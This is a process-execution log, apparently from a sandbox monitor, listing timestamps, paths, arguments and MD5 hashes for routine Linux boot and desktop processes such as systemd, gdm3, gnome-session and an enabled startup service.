                                                                                                              Start time (UTC):00:09:34
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/bin/sh
                                                                                                              Arguments:-
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                              Start time (UTC):00:09:34
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/bin/systemctl
                                                                                                              Arguments:systemctl enable startup_command.service
                                                                                                              File size:996584 bytes
                                                                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                              Start time (UTC):00:09:34
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/lib/systemd/systemd
                                                                                                              Arguments:-
                                                                                                              File size:1620224 bytes
                                                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                              Start time (UTC):00:09:34
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                              File size:22760 bytes
                                                                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                              Start time (UTC):00:09:35
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/lib/systemd/systemd
                                                                                                              Arguments:-
                                                                                                              File size:1620224 bytes
                                                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                              Start time (UTC):00:09:35
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                              File size:22760 bytes
                                                                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                              Start time (UTC):00:09:36
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/libexec/gnome-session-binary
                                                                                                              Arguments:-
                                                                                                              File size:334664 bytes
                                                                                                              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                              Start time (UTC):00:09:36
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/bin/sh
                                                                                                              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                              Start time (UTC):00:09:36
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/libexec/gsd-rfkill
                                                                                                              Arguments:/usr/libexec/gsd-rfkill
                                                                                                              File size:51808 bytes
                                                                                                              MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                                                                              Start time (UTC):00:09:37
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/lib/systemd/systemd
                                                                                                              Arguments:-
                                                                                                              File size:1620224 bytes
                                                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                              Start time (UTC):00:09:37
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/lib/systemd/systemd-hostnamed
                                                                                                              Arguments:/lib/systemd/systemd-hostnamed
                                                                                                              File size:35040 bytes
                                                                                                              MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                                                                              Start time (UTC):00:09:38
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/sbin/gdm3
                                                                                                              Arguments:-
                                                                                                              File size:453296 bytes
                                                                                                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                                              Start time (UTC):00:09:38
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/etc/gdm3/PrimeOff/Default
                                                                                                              Arguments:/etc/gdm3/PrimeOff/Default
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                              Start time (UTC):00:09:38
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/sbin/gdm3
                                                                                                              Arguments:-
                                                                                                              File size:453296 bytes
                                                                                                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                                              Start time (UTC):00:09:38
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/etc/gdm3/PrimeOff/Default
                                                                                                              Arguments:/etc/gdm3/PrimeOff/Default
                                                                                                              File size:129816 bytes
                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                              Start time (UTC):00:09:48
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/usr/lib/systemd/systemd
                                                                                                              Arguments:-
                                                                                                              File size:1620224 bytes
                                                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                              Start time (UTC):00:09:48
                                                                                                              Start date (UTC):07/01/2025
                                                                                                              Path:/lib/systemd/systemd-user-runtime-dir
                                                                                                              Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                                                                                              File size:22672 bytes
                                                                                                              MD5 hash:d55f4b0847f88131dbcfb07435178e54